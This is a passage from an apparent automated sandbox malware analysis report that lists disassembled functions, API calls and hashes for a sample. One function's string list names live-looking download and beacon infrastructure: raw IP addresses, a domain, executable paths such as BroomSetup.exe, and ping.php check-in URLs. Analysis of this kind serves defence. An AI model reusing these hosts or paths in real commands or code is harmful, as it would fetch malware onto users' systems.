Instruction Fuzzy Hash: 0F218E70601611DFC728DF15C54896ABBF5FF88314B10C26DE85A9B7A1C770EE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0041AED0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 0041AF0E

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 77aa99f2f88df8cd4d36c2d0dc9640374021eb40fe0889f8d183050a52ea336c
Instruction ID: 1154e27c015a897812a0a5709c6716ad0e12ceb5b9437c51957f638709d22443
Opcode Fuzzy Hash: 77aa99f2f88df8cd4d36c2d0dc9640374021eb40fe0889f8d183050a52ea336c
Instruction Fuzzy Hash: 68114C71904209AFCF05DF58E9419DB7BF4EF48314F10409AF808AB311D631D9618BAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040E1B2 Relevance: 1.5, APIs: 1, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 701e18208b567a6bb177b1ccb661cbfd4effab1e33f914200ccb643209a10c45
Instruction ID: bb13e13d757cd37dfe0a4f239b5d8845d05e4a8eb61872b1cde1787caac163ea
Opcode Fuzzy Hash: 701e18208b567a6bb177b1ccb661cbfd4effab1e33f914200ccb643209a10c45
Instruction Fuzzy Hash: E4F0F93254061496D6213A6B9C0579B32AC9F92339F114BBFFC30A61C2CA7CE95246AE

Uniqueness

Uniqueness Score: -1.00%

Function 00402F6B Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402F70

Part of subcall function 004035F5: __EH_prolog.LIBCMT ref: 004035FA
Part of subcall function 004035F5: std::_Lockit::_Lockit.LIBCPMT ref: 00403609
Part of subcall function 004035F5: int.LIBCPMT ref: 00403620
Part of subcall function 004035F5: std::locale::_Getfacet.LIBCPMT ref: 00403629
Part of subcall function 004035F5: std::_Lockit::~_Lockit.LIBCPMT ref: 00403670

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: H_prologLockitstd::_$GetfacetLockit::_Lockit::~_std::locale::_
String ID:
API String ID: 3585332825-0
Opcode ID: 6af91489f422ab2b9346da6299f13020bb6ba693aa2f45747282a65afbb3964b
Instruction ID: 08e3709e77e7d1eb8e6a734fcd7c8cb2ed90b0a3f4c6ef6dd5fb35cf0d7a5197
Opcode Fuzzy Hash: 6af91489f422ab2b9346da6299f13020bb6ba693aa2f45747282a65afbb3964b
Instruction Fuzzy Hash: 80018F70A10114AFDB14EB25DA4ABAE77F9AF04708F00403EF405B76D1DBF8AE008B58

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1D1 Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0041A212

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 68fd172b046a401a07b87b6cc8e6e0eb4e84c281b2bbab5ff70b0aff8b290acd
Instruction ID: 12cd10f48dc7b96564373969defca7bad1702ec24c59837b56aad39c86ff4cfc
Opcode Fuzzy Hash: 68fd172b046a401a07b87b6cc8e6e0eb4e84c281b2bbab5ff70b0aff8b290acd
Instruction Fuzzy Hash: AFF09A32511119BBCF005E96DC02CDA3B6EEF89334F100156F91492150DA3ADD60A7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00417A45 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b75641747b422377c90d67b6dee4493775f18ffac96cc9d64fbbcf0dcb9ea88a
Instruction ID: 1d8c2cfb616aaf75abf93827710d27348e1db2613881ba842acdabaabffa5ab7
Opcode Fuzzy Hash: b75641747b422377c90d67b6dee4493775f18ffac96cc9d64fbbcf0dcb9ea88a
Instruction Fuzzy Hash: 4BE0A03168822557A72026629C04BDF6669AF417E0F150223AC04962A0CB6C8FD181ED

Uniqueness

Uniqueness Score: -1.00%

Function 00409256 Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00409967

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: Exception@8Throw
String ID:
API String ID: 2005118841-0
Opcode ID: 25d8b0dcc0aeb082a63c197dce86bf9214427bbe7c1bc7486ec08e7daa717c4d
Instruction ID: 8f33375d03ef340e879cf663a0733e21cf849d267f07301eb1b68e0c667a0042
Opcode Fuzzy Hash: 25d8b0dcc0aeb082a63c197dce86bf9214427bbe7c1bc7486ec08e7daa717c4d
Instruction Fuzzy Hash: 1FE0923440430DB6CF007A66E8169AE772C1E04324B20497FB928B56E2EF78DD96C18E

Uniqueness

Uniqueness Score: -1.00%

Function 00419F10 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ec085ca9659a0f56eb08fe4c6845a4ad54c8fcd842bd73b4fead1427a61b2733
Instruction ID: 9d2ef54cfd7c3626aa2ff180f2ecc7fa707dd95b0fec4855ab8d986de787a24b
Opcode Fuzzy Hash: ec085ca9659a0f56eb08fe4c6845a4ad54c8fcd842bd73b4fead1427a61b2733
Instruction Fuzzy Hash: E9D06C3210010DBBDF128F85DC06EDA3BAAFB4C714F014010FA1856020C732E832EB94

Uniqueness

Uniqueness Score: -1.00%

Function 040F5895 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 040F58E6

Memory Dump Source

Source File: 00000000.00000002.1985953400.00000000040F5000.00000040.00000020.00020000.00000000.sdmp, Offset: 040F5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40f5000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 08da15c99fa2883c8e63932d5714016fedd5b000ffe9cf906c14193a8090b7f0
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: D0113279A00208FFDB01DF98C985E98BBF5AF08351F0580A4F9489B362D375EA50DF40

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 05B84C75 Relevance: 48.5, APIs: 2, Strings: 25, Instructions: 1237COMMON

Download Yara Rule

APIs

Part of subcall function 05B86823: __EH_prolog.LIBCMT ref: 05B86828

GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043BEDC), ref: 05B84D3B

Part of subcall function 05B862B1: __EH_prolog.LIBCMT ref: 05B862B6
Part of subcall function 05B862B1: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 05B86398

Strings

.exe, xrefs: 05B85B18, 05B85B3A
.exe, xrefs: 05B8618D, 05B861AF
SOFTWARE\BroomCleaner, xrefs: 05B85358, 05B8544C
185.172.128.228, xrefs: 05B85527, 05B855CD, 05B8574C
\run.exe, xrefs: 05B85E37, 05B85E8F
P, xrefs: 05B8614A
iC, xrefs: 05B85E24
185.172.128.59, xrefs: 05B857A3, 05B8583D, 05B85AB4
P, xrefs: 05B8575C
/BroomSetup.exe, xrefs: 05B8604E, 05B860F4, 05B86142
P, xrefs: 05B85312
.zip, xrefs: 05B85DC4, 05B85DE6
/ping.php?substr=%s, xrefs: 05B855EE, 05B856C4, 05B856DC
@, xrefs: 05B84CE3
/1/Package.zip, xrefs: 05B85C7B, 05B85D15, 05B85D6F
/timeSync.exe, xrefs: 05B859C6, 05B85A59, 05B85AC7
/cpa/ping.php?substr=%s&s=ab&sub=%s, xrefs: 05B8501D, 05B851B3, 05B851CC
185.172.128.203, xrefs: 05B8585E, 05B85904, 05B85AA6
P, xrefs: 05B85ABC
185.172.128.228, xrefs: 05B85F88, 05B86034, 05B86139
P, xrefs: 05B85D77
Installed, xrefs: 05B85466, 05B854C4
note.padd.cn.com, xrefs: 05B85BA9, 05B85C61, 05B85D66
185.172.128.90, xrefs: 05B8521A, 05B852B4, 05B85302
/syncUpd.exe, xrefs: 05B85923, 05B859A5, 05B85AD6

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
String ID: @$ iC$.exe$.exe$.zip$/1/Package.zip$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$/timeSync.exe$185.172.128.203$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$SOFTWARE\BroomCleaner$\run.exe$note.padd.cn.com
API String ID: 2531350358-3920416335
Opcode ID: 250d8a035f8b337f53b0f2b82bef072aba3463d320e73a283fe624a254bad318
Instruction ID: 99cc6714516f8909dad58e2b9982786623075aadd147b919e68169f16a2597cd
Opcode Fuzzy Hash: 250d8a035f8b337f53b0f2b82bef072aba3463d320e73a283fe624a254bad318
Instruction Fuzzy Hash: D1A2231060F2D0AEC711B77D585A7DE2BE19B63240F5478EDC2A85B372CB69A10CC7DA

Uniqueness

Uniqueness Score: -1.00%

Function 0042086B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85

GetUserDefaultLCID.KERNEL32 ref: 00420977
IsValidCodePage.KERNEL32(00000000), ref: 004209D2
IsValidLocale.KERNEL32(?,00000001), ref: 004209E1
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00420A29
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00420A48

Strings

,CUSA, xrefs: 004208D0

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: ,CUSA
API String ID: 745075371-2978500865
Opcode ID: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction ID: 7ddd42caa13bcc6a581a5d9380eb1867f4bda1d866acf156490288d52a5f9f8d
Opcode Fuzzy Hash: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction Fuzzy Hash: 2351A4B1B002299BEB20DFA5EC45BBF77F8AF04700F54056BE505E7252D7789980CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0042140C Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00421552

Strings

1#SNAN, xrefs: 00422751
1#INF, xrefs: 0042275F
1#IND, xrefs: 0042274A
1#QNAN, xrefs: 00422758

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: a37a3ecc05295ae32eb63500af4b11397377d5339e0099b2d7883d6d4fea4a99
Instruction ID: ba3d8f5800837f2e7df06b198bc907b13d59b0e20819b9a43c463b3a9b279e29
Opcode Fuzzy Hash: a37a3ecc05295ae32eb63500af4b11397377d5339e0099b2d7883d6d4fea4a99
Instruction Fuzzy Hash: 04C25A71E082289FDB25CE28ED407EAB7B5EB94304F5541EBD84DE7250E778AE818F44

Uniqueness

Uniqueness Score: -1.00%

Function 0041FF33 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

IsValidCodePage.KERNEL32(00000000), ref: 00420015
_wcschr.LIBVCRUNTIME ref: 004200A5
_wcschr.LIBVCRUNTIME ref: 004200B3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00420156

Strings

,CUSA, xrefs: 0041FF71

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID: ,CUSA
API String ID: 4212172061-2978500865
Opcode ID: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
Instruction ID: fa09c2a12b3627a5d585845c4e70effd6588540dd04b31b38b5545ebe516d264
Opcode Fuzzy Hash: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
Instruction Fuzzy Hash: 2C610871700216AAE724AB35EC42BEB77E8EF04314F14403FF505D7282EA79E986C769

Uniqueness

Uniqueness Score: -1.00%

Function 05B808FE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 05B80997
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 05B809C0
GetACP.KERNEL32 ref: 05B809D5

Strings

ACP, xrefs: 05B8091C
OCP, xrefs: 05B80952

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction ID: 1d5c913e58b37dfe6072e068786a2bc4e0e041b52b9ba63fa31f49ac7e247ed8
Opcode Fuzzy Hash: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction Fuzzy Hash: 1C21B532B4510DEAF730BF5DC909BB772A7FB44AA0B4694E4E96AD7100E732E944C390

Uniqueness

Uniqueness Score: -1.00%

Function 00420697 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 00420730
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 00420759
GetACP.KERNEL32 ref: 0042076E

Strings

ACP, xrefs: 004206B5
OCP, xrefs: 004206EB

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction ID: ccfaff94e51ab864e712d9520aeba98098d7830e350b78e24d8ea24043a496f3
Opcode Fuzzy Hash: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction Fuzzy Hash: 8821F422B00125ABD7308F14E900A9BB3E6ABD4B50BD68176E90AD7312E736ED41CB48

Uniqueness

Uniqueness Score: -1.00%

Function 05B80AD2 Relevance: 7.7, APIs: 5, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 05B76F80: GetLastError.KERNEL32(?,?,05B6E697,?,?,?,05B6ED94,?), ref: 05B76F84
Part of subcall function 05B76F80: _free.LIBCMT ref: 05B76FB7
Part of subcall function 05B76F80: SetLastError.KERNEL32(00000000), ref: 05B76FF8
Part of subcall function 05B76F80: _abort.LIBCMT ref: 05B76FFE

Part of subcall function 05B76F80: _free.LIBCMT ref: 05B76FDF
Part of subcall function 05B76F80: SetLastError.KERNEL32(00000000), ref: 05B76FEC

GetUserDefaultLCID.KERNEL32 ref: 05B80BDE
IsValidCodePage.KERNEL32(00000000), ref: 05B80C39
IsValidLocale.KERNEL32(?,00000001), ref: 05B80C48
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 05B80C90
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 05B80CAF

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID:
API String ID: 745075371-0
Opcode ID: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction ID: 720f8fe3cccc43181e7169b72725e7d099e83b7c2264ad172b6a36f655c165c0
Opcode Fuzzy Hash: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction Fuzzy Hash: AE519371A4421DABDF20FFA5DC48ABE73B8FF04384F0854A9E915E7150EB70A908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 004123A0 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMON

Download Yara Rule

Strings

y%B, xrefs: 004123BD, 00412568, 0041278C, 00412726, 004125B6, 00412544
y%B, xrefs: 00412808, 004125F2, 00412481

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID:
String ID: y%B$y%B
API String ID: 0-2510245575
Opcode ID: 639d753ca5804acfb26a7323c6b70442fdf5003eed0a35c333bc141f8f4a1fb1
Instruction ID: 7f81a5055d29d3c9b3a65b9dd9c97bea9b47a5c616e9cad61c519a63aba044dd
Opcode Fuzzy Hash: 639d753ca5804acfb26a7323c6b70442fdf5003eed0a35c333bc141f8f4a1fb1
Instruction Fuzzy Hash: F8024C71E002199FDF14CFA9D9806EEB7F1FF88314F25826AD819E7380D774AA518B94

Uniqueness

Uniqueness Score: -1.00%

Function 05B8019A Relevance: 6.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 05B76F80: GetLastError.KERNEL32(?,?,05B6E697,?,?,?,05B6ED94,?), ref: 05B76F84
Part of subcall function 05B76F80: _free.LIBCMT ref: 05B76FB7
Part of subcall function 05B76F80: SetLastError.KERNEL32(00000000), ref: 05B76FF8
Part of subcall function 05B76F80: _abort.LIBCMT ref: 05B76FFE

IsValidCodePage.KERNEL32(00000000), ref: 05B8027C
_wcschr.LIBVCRUNTIME ref: 05B8030C
_wcschr.LIBVCRUNTIME ref: 05B8031A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 05B803BD

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID:
API String ID: 4212172061-0
Opcode ID: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
Instruction ID: 4b521a50e55e1e4c6c74a0cea864140d29b1b1196051edb494815abb1694cfd2
Opcode Fuzzy Hash: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
Instruction Fuzzy Hash: 7C61E77270460AABD724FF74CC49EBA73A8FF08390F1454AAE516D7190EA74F948C764

Uniqueness

Uniqueness Score: -1.00%

Function 0042031E Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00420372
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004203C3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00420483

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: ebeadb8fc46471ca1094bfe87f264d7eb9befaa17c0ef6b2bdfff25920991829
Instruction ID: 150eb58c917d6dfbd7f4c2a18d44eb002ac57a30d794a2eb47e087b0f294e0c3
Opcode Fuzzy Hash: ebeadb8fc46471ca1094bfe87f264d7eb9befaa17c0ef6b2bdfff25920991829
Instruction Fuzzy Hash: D46185717001279BDB28DF25DC81BB677E8EF14344F50807AE905C6642E77CE995CB58

Uniqueness

Uniqueness Score: -1.00%

Function 05B709A2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 05B70A9A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 05B70AA4
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 05B70AB1

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction ID: b09352130630b6d54adc8faa0fd38e5ce154e2eeb6433562d4742dcd244718e5
Opcode Fuzzy Hash: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction Fuzzy Hash: 9F31747594121C9BCB21DF64D988799B7B4FF08310F5041EAE41CA72A0E7749B858F55

Uniqueness

Uniqueness Score: -1.00%

Function 0041073B Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00410833
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041083D
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041084A

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction ID: d1fab33c372cae0273f805137467810c70e9cba24fd9c5a15224a60e011b092e
Opcode Fuzzy Hash: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction Fuzzy Hash: E031C47490121C9BCB21EF25D9887CDB7B8BF08310F5041EAE41CA7291E7749F858F88

Uniqueness

Uniqueness Score: -1.00%

Function 05B73C4E Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,05B73C24,00000003,00438DB0,0000000C,05B73D7B,00000003,00000002,00000000,?,05B72DD2,00000003), ref: 05B73C6F
TerminateProcess.KERNEL32(00000000,?,05B73C24,00000003,00438DB0,0000000C,05B73D7B,00000003,00000002,00000000,?,05B72DD2,00000003), ref: 05B73C76
ExitProcess.KERNEL32 ref: 05B73C88

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction ID: 69ccf398c72638b8254e95692effb430194a112f6eec016c6a8f326e447d86ef
Opcode Fuzzy Hash: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction Fuzzy Hash: 0DE0BF3120060DABCF116F64DD0CA593F69FB44291F504464FD5686131CB35EE52DA44

Uniqueness

Uniqueness Score: -1.00%

Function 05B6092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

l, xrefs: 05B60966
GetProcAddress., xrefs: 05B609DC, 05B609DF, 05B609E4
., xrefs: 05B6095F

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: cc0f85a33508f70770c3fe503102feccc68d44d1941a8730300d6716a0dd471e
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: FE318CB6900609CFDB10DF99C884AAEBBF6FF08324F14418AD841A7350D775FA45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004174E4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00413D9B,?,00000004), ref: 00417537

Strings

GetLocaleInfoEx, xrefs: 004174F5, 004174FF

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

